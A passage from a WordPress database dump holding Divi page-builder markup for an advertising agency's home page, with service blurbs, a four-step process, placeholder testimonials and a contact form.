allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" hover_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Best-advertising-agency.png\" alt=\"Best Advertising Agency\" title_text=\"Best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Our-approach.png\" alt=\"Our approach\" title_text=\"Our approach\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-06 11:45:29','2020-08-06 11:45:29','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/06/134-revision-v1/',0,'revision','',0),(440,1,'2020-08-06 20:48:11','2020-08-06 20:48:11','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" 